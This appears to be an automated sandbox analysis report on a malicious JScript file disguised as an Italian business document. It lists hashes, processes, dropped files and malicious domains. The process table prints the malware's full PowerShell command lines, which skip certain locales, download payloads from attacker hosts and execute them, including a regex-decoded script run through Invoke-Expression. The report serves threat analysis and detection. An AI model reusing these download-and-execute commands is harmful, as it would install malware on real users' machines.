Field | Value
---|---|
File name | Restructura_Torino_Novembre2019 2019 06050316583311 xm.js
Full analysis | https://app.any.run/tasks/d3bbc84d-6ba8-4c31-a200-eb62c5a089e9
Verdict | Malicious activity
Analysis date | March 21, 2019, 15:13:01
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators | 
MIME | text/plain
File info | ASCII text, with CRLF, LF line terminators
MD5 | D10081172E8B798A5C1B7F4EB15D26A6
SHA1 | B4105600320925EEBC366F4F44293D114039D827
SHA256 | B27E6BF73D4B1456AC50DAF67CE728C8A1FBC1D07C9BE1D163596DCDEC60C047
SSDEEP | 192:2nbbxRvZ9BswCOCY4pTnDcojaTnfQFFtWJjuZ5YJPitAjTifYP4q:2lsbjjGfstW4Z9MTsYAq
PID | CMD | Path | Indicators | Parent process | Details
---|---|---|---|---|---|
2712 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Restructura_Torino_Novembre2019 2019 06050316583311 xm.js" | C:\Windows\System32\WScript.exe | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Windows Based Script Host; Exit code: 0; Version: 5.8.7600.16385
4064 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" if( (Get-UICulture).Name -match 'RU\|UA\|BY\|CN'){ exit; } $bvyxv = [System.IO.Path]::GetTempPath() + '\SearchI32.js'; ( New-Object System.Net.WebClient ).DownloadFile('http://cloud.kokoheadattorney.com/502?ycyjheadezafitzhwh',$bvyxv); Start-Process $bvyxv; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WScript.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2220 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" if( (Get-UICulture).Name -match 'RU\|UA\|BY\|CN'){ exit; } $iezwjdihceegvxh = [System.IO.Path]::GetTempPath() +'\..' +'\' + 'Dke.exe'; ( New-Object System.Net.WebClient ).DownloadFile('http://cloud.kokoheadattorney.com/501?fhigcxjwfvehg',$iezwjdihceegvxh); Start-Process $iezwjdihceegvxh; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WScript.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
1708 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\SearchI32.js" | C:\Windows\System32\WScript.exe | — | powershell.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Windows Based Script Host; Exit code: 0; Version: 5.8.7600.16385
2316 | "C:\Windows\system32\ntvdm.exe" -i1 | C:\Windows\system32\ntvdm.exe | — | powershell.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: NTVDM.EXE; Exit code: 3221225477; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3412 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" if( (Get-UICulture).Name -match 'RU\|UA\|BY\|CN'){ exit; } $sxtywszfjtzczixzjg = [System.IO.Path]::GetTempPath() + '\SearchI32.txt';$vdbsbvceuvayxftwebhu = ''; ( New-Object System.Net.WebClient ).DownloadFile('http://cdn.zaczvk.pl/crypt0DD1D2637FDB71097213D70B94E86930.php',$sxtywszfjtzczixzjg);;Get-Content $sxtywszfjtzczixzjg \| Where-Object {$_ -match $regex} \| ForEach-Object { $vdbsbvceuvayxftwebhu += $_ -replace '..(.)','$1'} ;Invoke-Expression -Command $vdbsbvceuvayxftwebhu; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WScript.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---|
4064 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9ZCYSP5HMI8QD991DNUH.temp | — | — | —
2220 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N3M37PR26CRM42AST27M.temp | — | — | —
3412 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CSP281VN7APUUQ0ZL3M1.temp | — | — | —
4064 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFffbfa.TMP | binary | 16D0FD6E07266B2C15A9D7BC6623F506 | 833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
2220 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFffc0a.TMP | binary | 16D0FD6E07266B2C15A9D7BC6623F506 | 833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
3412 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF100419.TMP | binary | 16D0FD6E07266B2C15A9D7BC6623F506 | 833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
2220 | powershell.exe | C:\Users\admin\AppData\Local\Dke.exe | text | 905F2BB7E8852FB96CB9AEFF9568A839 | 792376C209F338959BE4CF00C54DBF82662B90516082E23106FAEC4C43C69E49
3412 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 16D0FD6E07266B2C15A9D7BC6623F506 | 833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
2220 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 16D0FD6E07266B2C15A9D7BC6623F506 | 833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
4064 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 16D0FD6E07266B2C15A9D7BC6623F506 | 833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2220 | powershell.exe | GET | 200 | 31.214.157.69:80 | http://cloud.kokoheadattorney.com/501?fhigcxjwfvehg | NL | text | 4 b | malicious |
4064 | powershell.exe | GET | 200 | 31.214.157.69:80 | http://cloud.kokoheadattorney.com/502?ycyjheadezafitzhwh | NL | text | 9.77 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3412 | powershell.exe | 185.158.250.114:80 | cdn.zaczvk.pl | M247 Ltd | NL | malicious |
4064 | powershell.exe | 31.214.157.69:80 | cloud.kokoheadattorney.com | easystores GmbH | NL | suspicious |
2220 | powershell.exe | 31.214.157.69:80 | cloud.kokoheadattorney.com | easystores GmbH | NL | suspicious |
Domain | IP | Reputation
---|---|---|
cloud.kokoheadattorney.com | | malicious
cdn.zaczvk.pl | | unknown